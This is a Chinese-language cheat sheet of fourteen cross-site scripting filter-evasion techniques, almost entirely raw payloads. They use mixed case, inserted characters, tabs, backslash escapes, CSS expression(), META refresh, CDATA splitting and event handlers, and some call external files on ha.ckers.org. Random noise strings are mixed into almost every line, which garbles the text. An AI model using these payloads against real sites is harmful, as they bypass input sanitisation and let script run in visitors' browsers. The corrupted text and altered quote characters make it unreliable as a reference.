1. 改变字符大小写5 k3 ~4 V4 j H& E
- i6 T: [+ V3 o5 g& x$ x
" @: [: b; _1 H
I9 h& p% S3 ?( ]
<sCript>alert(‘d’)</scRipT>
6 e0 [8 v5 N# w( y7 Y4 w5 A. y7 d y* ^0 K% v
2. 利用多加一些其它字符来规避Regular Expression的检查
6 O0 P& N8 ?+ x7 y0 j& L Z ]9 c7 H W( H' z/ |
<<script>alert(‘c’)//<</script>
& [! z. Z$ l+ K$ ^2 M" k+ q- {8 G' {/ O5 X. I+ C
<SCRIPT a=">" SRC="t.js"></SCRIPT>
$ `9 e h$ `3 p8 ]1 H
# N0 X/ F& _! j z$ x: A <SCRIPT =">" SRC="t.js"></SCRIPT>
1 f8 d6 `' \3 @9 {: s5 y4 O# ?/ ~- I V
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>1 L. I- Q: ~, c4 _( }
. ^, v* U+ e4 w! J5 x <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
3 ^2 v0 [1 Y+ W8 n5 E% Z9 `; K
& h, k$ B1 j( D! U4 L0 h <SCRIPT a=`>` SRC="t.js"></SCRIPT>
2 t1 j2 v& _3 e1 [4 N& \
$ D, V Z. M4 B9 K2 {( K( K <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
3 ~' g* b; c P2 I/ |' M9 N" W7 b, p, D+ i; L6 c
3. 以其它扩展名取代.js7 I" H; n3 Z" j! m9 j# p
+ X" j. O( {! M$ c( `$ |
<script src="bad.jpg"></script>
. L" @& [9 b6 x5 n) w: @7 W% n" t8 C+ |# D1 |5 Q1 t, u# s
4. 将Javascript写在CSS档里
# X1 I1 z: `* K- G2 m1 L1 {. z( g5 _* H. f- ~$ s
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">* `9 D( r" }- S$ d6 @8 t, `
/ A" N1 c9 F6 g+ Y example:
- Q6 A! y% c& o1 ~' U
" `, c2 n0 m# o' S9 e+ {) i body {& O: D! d: \; a" u( ]
& I7 g: o8 i) |" K( b
background-image: url(‘javascript:alert("XSS");’)3 _1 | U! y; \* W( K" @& Q
5 c$ P4 L6 v" V! f
}
* N6 p/ C/ R) }" ~
, b" y6 x9 j5 E& N5. 在script的tag里加入一些其它字符
+ r. |; |, v8 B' J' ?) b) k6 w6 v! W( U7 Y
<SCRIPT/SRC="t.js"></SCRIPT>6 b8 |( h. {% Y
% P( L ^5 Z$ C! M* r6 j4 j7 E
<SCRIPT/anyword SRC="t.js"></SCRIPT>' k, K8 Z p0 _# H1 i
1 B |' q! M1 L8 d
6. 使用tab或是new line来规避' c/ a- N# M6 v9 D5 Y+ W6 V$ ]
' q* M' y4 h8 O3 B5 V) r y v3 S
<img src="jav ascr ipt:alert(‘XSS3′)">0 `! H$ }/ U/ C7 y! T
E; ]7 j/ ]+ j1 n3 f! B5 F% E# a' S <img src="jav ascr ipt:alert(‘XSS3′)">
% _' R9 M' ?: y6 o0 x* O+ W; m1 x* M$ D; s7 l# Y1 ?+ Q: C+ x
<IMG SRC="jav ascript:alert(‘XSS’);">6 k6 I! E$ S8 k! `/ J
. F. s N) R4 D% i* l- U T -> tag& a6 L6 r4 k0 `" v
* u" T" X4 U5 Z* m M
-> new line
5 A: J8 e3 o. D+ m* V, X' @+ ~* c
7. 使用"\"来规避
5 p6 W8 d7 l1 [+ f$ E
5 X+ H. K, f7 d* S( r3 f <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>% X7 P' ~6 L# a$ d/ s5 ~
: I. `, l" t5 ?. t4 { <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>! Y: w) R" ^ i2 z5 y* A
; h9 v( H4 ~9 a# z9 W8 W
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">1 K2 ]( p, D$ F O0 _+ D% v, w8 R
, e) z b8 E4 s' h <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
3 N, y+ j- W) [2 M3 U0 L
) z, S$ ?9 r, e: @6 p' V: w N <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>2 `' @$ J- B) E0 b9 A7 J
; s) \- p7 }+ }1 W8 h: x$ {. y8. 使用Hex encode来规避(也可能会把";"拿掉)
- P' D" r$ {# t' ~3 E9 _% }
4 w" g6 N+ M" X+ A <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">4 B) a- J0 h; I* d+ S; H
; M1 a9 l I! T* ~9 R
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
- O3 X" G' c3 Z9 l, H, M( j' G! }7 F: q2 ]% _
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
. A* _0 \$ u2 R4 b
( H1 m8 q7 v# ^+ U0 n( ^ 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
( ]1 o7 h) O! t1 v( d3 l8 Q# {( n. u E8 L7 H# [9 }
9. script in HTML tag
( I: l/ v' m" ~8 _4 L3 O) B
4 @5 F# w. M+ L0 a$ C' ` <body onload=」alert(‘onload’)」>* _8 X C0 m9 g! R
8 J% k+ c& `4 J+ J/ U/ M
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload: X: V4 E" t: u
0 C2 Y! t$ I H1 y- l7 S10. 在swf里含有xss的code
2 k6 ?& ~* E' g$ B( z" U
* W1 e+ X% o Y; l <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>& v5 L: v }& Z* @6 K% ]
) Q; \& t5 O* ^% N' }11. 利用CDATA将xss的code拆开,再组合起来。
+ Y4 |& o3 H! `! c# }4 o7 D9 `/ L' Y6 }: F/ a0 X
<XML ID=I><X><C>8 Y. ?% S# B/ ]" ~6 }
' ?$ e4 C, _* v% m2 W$ k; P2 ^ <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>; q, M- e; V9 w( c! }! n' _
) p7 Y4 `, j" U
</C></X>! n" }1 W" l3 u! E: E$ E) x$ [
5 n5 S, K7 \8 Q* d# a
</xml>
. y2 D5 B, T) M; Q6 M
. B; X$ _" J- n+ u$ F4 T& b" H& D2 o <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>- a. p+ _1 v+ i! `; Y
0 V3 `, Z; ]+ q8 }+ g& n
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
/ j( _$ m% ^; |& X2 G( i4 q( W7 h/ r
, W; l' z* K' E# o" f% G, ] <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
& @: t9 F6 e2 u$ }; O' S- R
5 u& |0 @; u5 \1 Y( v12. 利用HTML+TIME。* P( E* d" E4 o) m: o# O
( L) Y+ A' w, Z+ ~- V. ~2 D <HTML><BODY>% n' f4 l4 s1 g& j) y& |9 u! V l
3 e8 c$ a5 G3 h, G1 k
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
. h1 e6 P: P1 N4 o& p/ N* e- u# R7 y- } Z Q
<?import namespace="t" implementation="#default#time2">
- L @+ B' C. w& N9 Z: r: }4 y/ j* r( z
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">' }5 u# H6 h+ |. O* X( g# c$ d( w/ E
' L' b- ~( Z) i# [4 w) u3 `2 b
</BODY></HTML>
3 {" n. H6 a P9 u
8 {$ F, }( p) |& i, P8 }13. 透过META写入Cookie。
% H& O/ W- I& j$ ]$ L: E, {
5 ?, k5 f% r4 b. @: Z& k. K <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
' V z# A4 q. @
) h5 `7 [2 A7 d# ]( ~14. javascript in src , href , url
; r" f% i2 ~+ l, J
5 r- l" c% U$ p& x* P% r1 o' ? <IFRAME SRC=javascript:alert(’13′)></IFRAME>
! u8 t% j/ s `( T T# ~. } w/ ~6 ^* N) l
<img src="javascript:alert(‘XSS3′)">6 L0 d/ B# l. N9 \7 A/ u
0 |# s1 v1 e; V {, r7 }; y3 {! W( p, f
<IMG DYNSRC="javascript:alert(‘XSS20′)">* K% ?9 h' ?1 { W
( [3 q0 P% x) t# {# x0 [ <IMG LOWSRC="javascript:alert(‘XSS21′)">9 n3 K# `3 m) e1 T9 f
$ j0 H, D6 l/ ^; o' Y7 s <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
: p0 c, T7 e7 u4 D/ X7 @) z
9 k1 l' Y% O7 a! N <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>0 C+ m6 O# m# X7 S) S9 I6 E' _
: v* ]0 K* y, W( ]
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">3 h: K0 u' c& c# [1 y
" e3 c( S4 _$ S: V4 H$ C) ~
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">5 D W8 b" M( O$ t
/ V- w6 @* J8 x5 U0 o <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
8 [6 H' i$ P* n/ S6 T; H( j1 e
$ W3 d8 ?" a2 Z B% i. E: Y& { </STYLE><A CLASS=XSS></A>
$ r6 J4 p, |, u- }% |1 \' M# u+ K2 W5 ?4 v2 ]- e
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>) D/ {7 k! P, r1 G) Y# ]
0 k. `) |8 V% z
|